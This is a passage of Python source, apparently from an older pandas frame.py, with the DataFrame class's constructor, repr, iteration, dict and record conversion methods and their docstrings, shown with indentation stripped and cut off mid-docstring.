from __future__ import division
# pylint: disable=E1101,E1103
# pylint: disable=W0212,W0231,W0703,W0622
import functools
import collections
import itertools
import sys
import types
import warnings
from textwrap import dedent
import numpy as np
import numpy.ma as ma
from pandas.core.accessor import CachedAccessor
from pandas.core.dtypes.cast import (
maybe_upcast,
cast_scalar_to_array,
maybe_cast_to_datetime,
maybe_infer_to_datetimelike,
maybe_convert_platform,
maybe_downcast_to_dtype,
invalidate_string_dtypes,
coerce_to_dtypes,
maybe_upcast_putmask,
find_common_type)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_object_dtype,
is_extension_type,
is_extension_array_dtype,
is_datetimetz,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_bool_dtype,
is_integer_dtype,
is_float_dtype,
is_integer,
is_scalar,
is_dtype_equal,
needs_i8_conversion,
_get_dtype_from_object,
_ensure_float,
_ensure_float64,
_ensure_int64,
_ensure_platform_int,
is_list_like,
is_nested_list_like,
is_iterator,
is_sequence,
is_named_tuple)
from pandas.core.dtypes.concat import _get_sliced_frame_result_type
from pandas.core.dtypes.missing import isna, notna
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (Index, MultiIndex, _ensure_index,
_ensure_index_from_sequences)
from pandas.core.indexing import (maybe_droplevels, convert_to_index_sliceable,
check_bool_indexer)
from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks)
from pandas.core.series import Series
from pandas.core.arrays import Categorical, ExtensionArray
import pandas.core.algorithms as algorithms
from pandas.compat import (range, map, zip, lrange, lmap, lzip, StringIO, u,
OrderedDict, raise_with_traceback)
from pandas import compat
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Appender, Substitution,
rewrite_axis_style_signature)
from pandas.util._validators import (validate_bool_kwarg,
validate_axis_style_args)
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
import pandas.core.common as com
import pandas.core.nanops as nanops
import pandas.core.ops as ops
import pandas.io.formats.console as console
import pandas.io.formats.format as fmt
from pandas.io.formats.printing import pprint_thing
import pandas.plotting._core as gfx
from pandas._libs import lib, algos as libalgos
from pandas.core.config import get_option
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes='index, columns', klass='DataFrame',
axes_single_arg="{0 or 'index', 1 or 'columns'}",
axis="""
axis : {0 or 'index', 1 or 'columns'}, default 0
- 0 or 'index': apply function to each column.
- 1 or 'columns': apply function to each row.""",
optional_by="""
by : str or list of str
Name or list of names to sort by.
- if `axis` is 0 or `'index'` then `by` may contain index
levels and/or column labels
- if `axis` is 1 or `'columns'` then `by` may contain column
levels and/or index labels
.. versionchanged:: 0.23.0
Allow specifying index or column level names.""",
versionadded_to_excel='',
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame objects by performing a database-style join operation by
columns or indexes.
If joining columns on columns, the DataFrame indexes *will be
ignored*. Otherwise if joining indexes on indexes or indexes on a column or
columns, the index will be passed on.
Parameters
----------%s
right : DataFrame
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : boolean, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels
right_index : boolean, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index
sort : boolean, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword)
suffixes : 2-length sequence (tuple, list, ...)
Suffix to apply to overlapping column names in the left and right
side, respectively
copy : boolean, default True
If False, do not copy data unnecessarily
indicator : boolean or string, default False
If True, adds a column to output DataFrame called "_merge" with
information on the source of each row.
If string, column with information on source of each row will be added to
output DataFrame, and column will be named value of string.
Information column is Categorical-type and takes on a value of "left_only"
for observations whose merge key only appears in 'left' DataFrame,
"right_only" for observations whose merge key only appears in 'right'
DataFrame, and "both" if the observation's merge key is found in both.
validate : string, default None
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
.. versionadded:: 0.21.0
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Examples
--------
>>> A >>> B
lkey value rkey value
0 foo 1 0 foo 5
1 bar 2 1 bar 6
2 baz 3 2 qux 7
3 foo 4 3 bar 8
>>> A.merge(B, left_on='lkey', right_on='rkey', how='outer')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 4 foo 5
2 bar 2 bar 6
3 bar 2 bar 8
4 baz 3 NaN NaN
5 NaN NaN qux 7
Returns
-------
merged : DataFrame
The output type will the be same as 'left', if it is a subclass
of DataFrame.
See also
--------
merge_ordered
merge_asof
DataFrame.join
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
""" Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure.
Parameters
----------
data : numpy ndarray (structured or homogeneous), dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.random.randint(low=0, high=10, size=(5, 5)),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df2
a b c d e
0 2 8 8 3 4
1 4 2 9 0 9
2 1 0 7 8 0
3 5 1 7 1 3
4 6 0 2 4 2
See also
--------
DataFrame.from_records : constructor from tuples, also record arrays
DataFrame.from_dict : from dicts of Series, arrays, or dicts
DataFrame.from_items : from sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard
"""
@property
def _constructor(self):
return DataFrame
_constructor_sliced = Series
_deprecations = NDFrame._deprecations | frozenset(
['sortlevel', 'get_value', 'set_value', 'from_csv', 'from_items'])
@property
def _constructor_expanddim(self):
from pandas.core.panel import Panel
return Panel
def __init__(self, data=None, index=None, columns=None, dtype=None,
copy=False):
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
if isinstance(data, DataFrame):
data = data._data
if isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, ma.MaskedArray):
import numpy.ma.mrecords as mrecords
# masked recarray
if isinstance(data, mrecords.MaskedRecords):
mgr = _masked_rec_array_to_mgr(data, index, columns, dtype,
copy)
# a masked array
else:
mask = ma.getmaskarray(data)
if mask.any():
data, fill_value = maybe_upcast(data, copy=True)
data[mask] = fill_value
else:
data = data.copy()
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (np.ndarray, Series, Index)):
if data.dtype.names:
data_columns = list(data.dtype.names)
data = {k: data[k] for k in data_columns}
if columns is None:
columns = data_columns
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif getattr(data, 'name', None) is not None:
mgr = self._init_dict({data.name: data}, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (list, types.GeneratorType)):
if isinstance(data, types.GeneratorType):
data = list(data)
if len(data) > 0:
if is_list_like(data[0]) and getattr(data[0], 'ndim', 1) == 1:
if is_named_tuple(data[0]) and columns is None:
columns = data[0]._fields
arrays, columns = _to_arrays(data, columns, dtype=dtype)
columns = _ensure_index(columns)
# set the index
if index is None:
if isinstance(data[0], Series):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
index = com._default_index(len(data[0]))
else:
index = com._default_index(len(data))
mgr = _arrays_to_mgr(arrays, columns, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
else:
mgr = self._init_dict({}, index, columns, dtype=dtype)
elif isinstance(data, collections.Iterator):
raise TypeError("data argument can't be an iterator")
else:
try:
arr = np.array(data, dtype=dtype, copy=copy)
except (ValueError, TypeError) as e:
exc = TypeError('DataFrame constructor called with '
'incompatible data and dtype: %s' % e)
raise_with_traceback(exc)
if arr.ndim == 0 and index is not None and columns is not None:
values = cast_scalar_to_array((len(index), len(columns)),
data, dtype=dtype)
mgr = self._init_ndarray(values, index, columns,
dtype=values.dtype, copy=False)
else:
raise ValueError('DataFrame constructor not properly called!')
NDFrame.__init__(self, mgr, fastpath=True)
def _init_dict(self, data, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if columns is not None:
columns = _ensure_index(columns)
# GH10856
# raise ValueError if only scalars in dict
if index is None:
extract_index(list(data.values()))
# prefilter if columns passed
data = {k: v for k, v in compat.iteritems(data) if k in columns}
if index is None:
index = extract_index(list(data.values()))
else:
index = _ensure_index(index)
arrays = []
data_names = []
for k in columns:
if k not in data:
# no obvious "empty" int column
if dtype is not None and issubclass(dtype.type,
np.integer):
continue
if dtype is None:
# 1783
v = np.empty(len(index), dtype=object)
elif np.issubdtype(dtype, np.flexible):
v = np.empty(len(index), dtype=object)
else:
v = np.empty(len(index), dtype=dtype)
v.fill(np.nan)
else:
v = data[k]
data_names.append(k)
arrays.append(v)
else:
keys = com._dict_keys_to_ordered_list(data)
columns = data_names = Index(keys)
arrays = [data[k] for k in keys]
return _arrays_to_mgr(arrays, data_names, index, columns, dtype=dtype)
def _init_ndarray(self, values, index, columns, dtype=None, copy=False):
# input must be a ndarray, list, Series, index
if isinstance(values, Series):
if columns is None:
if values.name is not None:
columns = [values.name]
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
# helper to create the axes as indexes
def _get_axes(N, K, index=index, columns=columns):
# return axes or defaults
if index is None:
index = com._default_index(N)
else:
index = _ensure_index(index)
if columns is None:
columns = com._default_index(K)
else:
columns = _ensure_index(columns)
return index, columns
# we could have a categorical type passed or coerced to 'category'
# recast this to an _arrays_to_mgr
if (is_categorical_dtype(getattr(values, 'dtype', None)) or
is_categorical_dtype(dtype)):
if not hasattr(values, 'dtype'):
values = _prep_ndarray(values, copy=copy)
values = values.ravel()
elif copy:
values = values.copy()
index, columns = _get_axes(len(values), 1)
return _arrays_to_mgr([values], columns, index, columns,
dtype=dtype)
elif (is_datetimetz(values) or is_extension_array_dtype(values)):
# GH19157
if columns is None:
columns = [0]
return _arrays_to_mgr([values], columns, index, columns,
dtype=dtype)
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy)
if dtype is not None:
if not is_dtype_equal(values.dtype, dtype):
try:
values = values.astype(dtype)
except Exception as orig:
e = ValueError("failed to cast to '%s' (Exception was: %s)"
% (dtype, orig))
raise_with_traceback(e)
index, columns = _get_axes(*values.shape)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values):
values = maybe_infer_to_datetimelike(values)
return create_block_manager_from_blocks([values], [columns, index])
@property
def axes(self):
"""
Return a list representing the axes of the DataFrame.
It has the row axis labels and column axis labels as the only members.
They are returned in that order.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.axes
[RangeIndex(start=0, stop=2, step=1), Index(['coll', 'col2'],
dtype='object')]
"""
return [self.index, self.columns]
@property
def shape(self):
"""
Return a tuple representing the dimensionality of the DataFrame.
See Also
--------
ndarray.shape
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.shape
(2, 2)
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4],
... 'col3': [5, 6]})
>>> df.shape
(2, 3)
"""
return len(self.index), len(self.columns)
def _repr_fits_vertical_(self):
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
def _repr_fits_horizontal_(self, ignore_width=False):
"""
Check if full repr fits in horizontal boundaries imposed by the display
options width and max_columns. In case off non-interactive session, no
boundaries apply.
ignore_width is here so ipnb+HTML output can behave the way
users expect. display.max_columns remains in effect.
GH3541, GH3573
"""
width, height = console.get_console_size()
max_columns = get_option("display.max_columns")
nb_columns = len(self.columns)
# exceed max columns
if ((max_columns and nb_columns > max_columns) or
((not ignore_width) and width and nb_columns > (width // 2))):
return False
# used by repr_html under IPython notebook or scripts ignore terminal
# dims
if ignore_width or not com.in_interactive_session():
return True
if (get_option('display.width') is not None or
com.in_ipython_frontend()):
# check at least the column row for excessive width
max_rows = 1
else:
max_rows = get_option("display.max_rows")
# when auto-detecting, so width=None and not in ipython front end
# check whether repr fits horizontal by actually checking
# the width of the rendered repr
buf = StringIO()
# only care about the stuff we'll actually print out
# and to_string on entire frame may be expensive
d = self
if not (max_rows is None): # unlimited rows
# min of two, where one may be None
d = d.iloc[:min(max_rows, len(d))]
else:
return True
d.to_string(buf=buf)
value = buf.getvalue()
repr_width = max(len(l) for l in value.split('\n'))
return repr_width < width
def _info_repr(self):
"""True if the repr should show the info view."""
info_repr_option = (get_option("display.large_repr") == "info")
return info_repr_option and not (self._repr_fits_horizontal_() and
self._repr_fits_vertical_())
def __unicode__(self):
"""
Return a string representation for a particular DataFrame
Invoked by unicode(df) in py2 only. Yields a Unicode String in both
py2/py3.
"""
buf = StringIO(u(""))
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(buf=buf, max_rows=max_rows, max_cols=max_cols,
line_width=width, show_dimensions=show_dimensions)
return buf.getvalue()
def _repr_html_(self):
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
# qtconsole doesn't report its line width, and also
# behaves badly when outputting an HTML table
# that doesn't fit the window, so disable it.
# XXX: In IPython 3.x and above, the Qt console will not attempt to
# display HTML, so this check can be removed when support for
# IPython 2.x is no longer needed.
if com.in_qtconsole():
# 'HTML output is disabled in QtConsole'
return None
if self._info_repr():
buf = StringIO(u(""))
self.info(buf=buf)
# need to escape the <class>, should be the first line.
val = buf.getvalue().replace('<', r'<', 1)
val = val.replace('>', r'>', 1)
return '<pre>' + val + '</pre>'
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
return self.to_html(max_rows=max_rows, max_cols=max_cols,
show_dimensions=show_dimensions, notebook=True)
else:
return None
@property
def style(self):
"""
Property returning a Styler object containing methods for
building a styled HTML representation fo the DataFrame.
See Also
--------
pandas.io.formats.style.Styler
"""
from pandas.io.formats.style import Styler
return Styler(self)
def iteritems(self):
"""
Iterator over (column name, Series) pairs.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
itertuples : Iterate over DataFrame rows as namedtuples of the values.
"""
if self.columns.is_unique and hasattr(self, '_item_cache'):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
def iterrows(self):
"""
Iterate over DataFrame rows as (index, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
Returns
-------
it : generator
A generator that iterates over the rows of the frame.
See also
--------
itertuples : Iterate over DataFrame rows as namedtuples of the values.
iteritems : Iterate over (column name, Series) pairs.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index=True, name="Pandas"):
"""
Iterate over DataFrame rows as namedtuples, with index value as first
element of the tuple.
Parameters
----------
index : boolean, default True
If True, return the index as the first element of the tuple.
name : string, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
With a large number of columns (>255), regular tuples are returned.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
iteritems : Iterate over (column name, Series) pairs.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
>>> df
col1 col2
a 1 0.1
b 2 0.2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='a', col1=1, col2=0.10000000000000001)
Pandas(Index='b', col1=2, col2=0.20000000000000001)
"""
arrays = []
fields = []
if index:
arrays.append(self.index)
fields.append("Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
# Python 3 supports at most 255 arguments to constructor, and
# things get slow with this many fields in Python 2
if name is not None and len(self.columns) + index < 256:
# `rename` is unsupported in Python 2.6
try:
itertuple = collections.namedtuple(name,
fields + list(self.columns),
rename=True)
return map(itertuple._make, zip(*arrays))
except Exception:
pass
# fallback to regular tuples
return zip(*arrays)
items = iteritems
def __len__(self):
"""Returns length of info axis, but here we use the index """
return len(self.index)
def dot(self, other):
"""
Matrix multiplication with DataFrame or Series objects
Parameters
----------
other : DataFrame or Series
Returns
-------
dot_product : DataFrame or Series
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if (len(common) > len(self.columns) or
len(common) > len(other.index)):
raise ValueError('matrices are not aligned')
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError('Dot product shape mismatch, %s vs %s' %
(lvals.shape, rvals.shape))
if isinstance(other, DataFrame):
return self._constructor(np.dot(lvals, rvals), index=left.index,
columns=other.columns)
elif isinstance(other, Series):
return Series(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return Series(result, index=left.index)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient='columns', dtype=None, columns=None):
"""
Construct DataFrame from dict of array-like or dicts.
Creates DataFrame object from dictionary by columns or by index
allowing dtype specification.
Parameters
----------
data : dict
Of the form {field : array-like} or {field : dict}.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer.
columns : list, default None
Column labels to use when ``orient='index'``. Raises a ValueError
if used with ``orient='columns'``.
.. versionadded:: 0.23.0
Returns
-------
pandas.DataFrame
See Also
--------
DataFrame.from_records : DataFrame from ndarray (structured
dtype), list of tuples, dict, or DataFrame
DataFrame : DataFrame object creation using constructor
Examples
--------
By default the keys of the dict become the DataFrame columns:
>>> data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Specify ``orient='index'`` to create the DataFrame using dictionary
keys as rows:
>>> data = {'row_1': [3, 2, 1, 0], 'row_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data, orient='index')
0 1 2 3
row_1 3 2 1 0
row_2 a b c d
When using the 'index' orientation, the column names can be
specified manually:
>>> pd.DataFrame.from_dict(data, orient='index',
... columns=['A', 'B', 'C', 'D'])
A B C D
row_1 3 2 1 0
row_2 a b c d
"""
index = None
orient = orient.lower()
if orient == 'index':
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient == 'columns':
if columns is not None:
raise ValueError("cannot use columns parameter with "
"orient='columns'")
else: # pragma: no cover
raise ValueError('only recognize index or columns for orient')
return cls(data, index=index, columns=columns, dtype=dtype)
def to_dict(self, orient='dict', into=dict):
"""
Convert the DataFrame to a dictionary.
The type of the key-value pairs can be customized with the parameters
(see below).
Parameters
----------
orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
Determines the type of the values of the dictionary.
- 'dict' (default) : dict like {column -> {index -> value}}
- 'list' : dict like {column -> [values]}
- 'series' : dict like {column -> Series(values)}
- 'split' : dict like
{'index' -> [index], 'columns' -> [columns], 'data' -> [values]}
- 'records' : list like
[{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
Abbreviations are allowed. `s` indicates `series` and `sp`
indicates `split`.
into : class, default dict
The collections.Mapping subclass used for all Mappings
in the return value. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
.. versionadded:: 0.21.0
Returns
-------
result : collections.Mapping like {column -> {index -> value}}
See Also
--------
DataFrame.from_dict: create a DataFrame from a dictionary
DataFrame.to_json: convert a DataFrame to JSON format
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2],
... 'col2': [0.5, 0.75]},
... index=['a', 'b'])
>>> df
col1 col2
a 1 0.50
b 2 0.75
>>> df.to_dict()
{'col1': {'a': 1, 'b': 2}, 'col2': {'a': 0.5, 'b': 0.75}}
You can specify the return orientation.
>>> df.to_dict('series')
{'col1': a 1
b 2
Name: col1, dtype: int64,
'col2': a 0.50
b 0.75
Name: col2, dtype: float64}
>>> df.to_dict('split')
{'index': ['a', 'b'], 'columns': ['col1', 'col2'],
'data': [[1.0, 0.5], [2.0, 0.75]]}
>>> df.to_dict('records')
[{'col1': 1.0, 'col2': 0.5}, {'col1': 2.0, 'col2': 0.75}]
>>> df.to_dict('index')
{'a': {'col1': 1.0, 'col2': 0.5}, 'b': {'col1': 2.0, 'col2': 0.75}}
You can also specify the mapping type.
>>> from collections import OrderedDict, defaultdict
>>> df.to_dict(into=OrderedDict)
OrderedDict([('col1', OrderedDict([('a', 1), ('b', 2)])),
('col2', OrderedDict([('a', 0.5), ('b', 0.75)]))])
If you want a `defaultdict`, you need to initialize it:
>>> dd = defaultdict(list)
>>> df.to_dict('records', into=dd)
[defaultdict(<class 'list'>, {'col1': 1.0, 'col2': 0.5}),
defaultdict(<class 'list'>, {'col1': 2.0, 'col2': 0.75})]
"""
if not self.columns.is_unique:
warnings.warn("DataFrame columns are not unique, some "
"columns will be omitted.", UserWarning,
stacklevel=2)
# GH16122
into_c = com.standardize_mapping(into)
if orient.lower().startswith('d'):
return into_c(
(k, v.to_dict(into)) for k, v in compat.iteritems(self))
elif orient.lower().startswith('l'):
return into_c((k, v.tolist()) for k, v in compat.iteritems(self))
elif orient.lower().startswith('sp'):
return into_c((('index', self.index.tolist()),
('columns', self.columns.tolist()),
('data', lib.map_infer(self.values.ravel(),
com._maybe_box_datetimelike)
.reshape(self.values.shape).tolist())))
elif orient.lower().startswith('s'):
return into_c((k, com._maybe_box_datetimelike(v))
for k, v in compat.iteritems(self))
elif orient.lower().startswith('r'):
return [into_c((k, com._maybe_box_datetimelike(v))
for k, v in zip(self.columns, np.atleast_1d(row)))
for row in self.values]
elif orient.lower().startswith('i'):
return into_c((t[0], dict(zip(self.columns, t[1:])))
for t in self.itertuples())
else:
raise ValueError("orient '%s' not understood" % orient)
def to_gbq(self, destination_table, project_id, chunksize=10000,
verbose=True, reauth=False, if_exists='fail', private_key=None):
"""Write a DataFrame to a Google BigQuery table.
The main method a user calls to export pandas DataFrame contents to
Google BigQuery table.
Google BigQuery API Client Library v2 for Python is used.
Documentation is available `here
<https://developers.google.com/api-client-library/python/apis/bigquery/v2>`__
Authentication to the Google BigQuery service is via OAuth 2.0.
- If "private_key" is not provided:
By default "application default credentials" are used.
If default application credentials are not found or are restrictive,
user account credentials are used. In this case, you will be asked to
grant permissions for product name 'pandas GBQ'.
- If "private_key" is provided:
Service account credentials will be used to authenticate.
Parameters
----------
dataframe : DataFrame
DataFrame to be written
destination_table : string
Name of table to be written, in the form 'dataset.tablename'
project_id : str
Google BigQuery Account project ID.
chunksize : int (default 10000)
Number of rows to be inserted in each chunk from the dataframe.
verbose : boolean (default True)
Show percentage complete
reauth : boolean (default False)
Force Google BigQuery to reauthenticate the user. This is useful
if multiple accounts are used.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
'fail': If table exists, do nothing.
'replace': If table exists, drop it, recreate it, and insert data.
'append': If table exists, insert data. Create if does not exist.
private_key : str (optional)
Service account private key in JSON format. Can be file path
or string contents. This is useful for remote server
authentication (eg. Jupyter/IPython notebook on remote host)
"""
from pandas.io import gbq
return gbq.to_gbq(self, destination_table, project_id=project_id,
chunksize=chunksize, verbose=verbose, reauth=reauth,
if_exists=if_exists, private_key=private_key)
@classmethod
def from_records(cls, data, index=None, exclude=None, columns=None,
coerce_float=False, nrows=None):
"""
Convert structured or record ndarray to DataFrame
Parameters
----------
data : ndarray (structured dtype), list of tuples, dict, or DataFrame
index : string, list of fields, array-like
Field of array to use as the index, alternately a specific set of
input labels to use
exclude : sequence, default None
Columns or fields to exclude
columns : sequence, default None
Column names to use. If the passed data do not have names
associated with them, this argument provides names for the
columns. Otherwise this argument indicates the order of the columns
in the result (any names not found in the data will become all-NA
columns)
coerce_float : boolean, default False
Attempt to convert values of non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
Returns
-------
df : DataFrame
"""
# Make a copy of the input columns so we can modify it
if columns is not None:
columns = _ensure_index(columns)
if is_iterator(data):
if nrows == 0:
return cls()
try:
first_row = next(data)
except StopIteration:
return cls(index=index, columns=columns)
dtype = None
if hasattr(first_row, 'dtype') and first_row.dtype.names:
dtype = first_row.dtype
values = [first_row]
if nrows is None:
values += data
else:
values.extend(itertools.islice(data, nrows - 1))
if dtype is not None:
data = np.array(values, dtype=dtype)
else:
data = values
if isinstance(data, dict):
if columns is None:
columns = arr_columns = _ensure_index(sorted(data))
arrays = [data[k] for k in columns]
else:
arrays = []
arr_columns = []
for k, v in compat.iteritems(data):
if k in columns:
arr_columns.append(k)
arrays.append(v)
arrays, arr_columns = _reorder_arrays(arrays, arr_columns,
columns)
elif isinstance(data, (np.ndarray, DataFrame)):
arrays, columns = _to_arrays(data, columns)
if columns is not None:
columns = _ensure_index(columns)
arr_columns = columns
else:
arrays, arr_columns = _to_arrays(data, columns,
coerce_float=coerce_float)
arr_columns = _ensure_index(arr_columns)
if columns is not None:
columns = _ensure_index(columns)
else:
columns = arr_columns
if exclude is None:
exclude = set()
else:
exclude = set(exclude)
result_index = None
if index is not None:
if (isinstance(index, compat.string_types) or
not hasattr(index, "__iter__")):
i = columns.get_loc(index)
exclude.add(index)
if len(arrays) > 0:
result_index = Index(arrays[i], name=index)
else:
result_index = Index([], name=index)
else:
try:
to_remove = [arr_columns.get_loc(field) for field in index]
index_data = [arrays[i] for i in to_remove]
result_index = _ensure_index_from_sequences(index_data,
names=index)
exclude.update(index)
except Exception:
result_index = index
if any(exclude):
arr_exclude = [x for x in exclude if x in arr_columns]
to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
arr_columns = arr_columns.drop(arr_exclude)
columns = columns.drop(exclude)
mgr = _arrays_to_mgr(arrays, arr_columns, result_index, columns)
return cls(mgr)
def to_records(self, index=True, convert_datetime64=True):
"""
